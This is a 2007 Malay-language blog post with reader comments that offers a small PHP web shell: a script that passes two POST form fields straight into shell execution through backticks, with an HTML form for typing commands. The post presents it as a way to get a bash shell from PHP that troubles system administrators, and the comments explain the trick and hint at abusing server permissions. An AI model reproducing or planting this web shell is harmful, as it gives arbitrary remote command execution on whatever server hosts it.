2007
06.23

2 sahabat lama



Salam semua..
php dan bash. Jika mereka bekerja sama, mampu memeningkan kepala sistem admin. :)
skrip php di bawah memudahkan anda untuk melarikan bash dari php.

berhati2 menggunakannya.

————————————

<?php

$parameter = $_POST['parameter'];
$arahan= $_POST['arahan'];
echo `$arahan $parameter`;

?>
<form method=’post’ action= >
task:<input type=text name=arahan value=’<?php echo $arahan ?>’ >
<br>
param2:<input type=text name=parameter size=200 value=’<?php echo $parameter ?>’ >

<input type=submit value=’berani?’>
</form>

——————————————-

7 comments so far

Add Your Comment
  1. err .. i couldnt see anything bash in the code ..

    tu bukan just print balik apa yg orang submit ke ..

  2. KageSenshi, take a good look at this part.

    echo `$arahan $parameter`;

    There’s something the author trying to say here, almost indirectly :)

  3. kekadang mata terlepas pandang,

    cuba serahkan kepada apache/php server utk menelitinya :D .
    try cut n paste, then you’ll see the result.

  4. tambah bagi senang baca hasilnya nanti:

  5. hmm, try contoh yang senang ni je;

    <?php
        echo `ls -lh`;
    ?>

    What would the author mean when he said it would peningkan sistem admin?
    HINT: permission, user
  6. mcm pnah nampak code ni? kat uitm aritu kot..
    hmmmm..
    congrates 3b055.org ;-)

  7. hehe… tapi tak leh guna pun… judge dah blok shell_execute awal2 lagi :(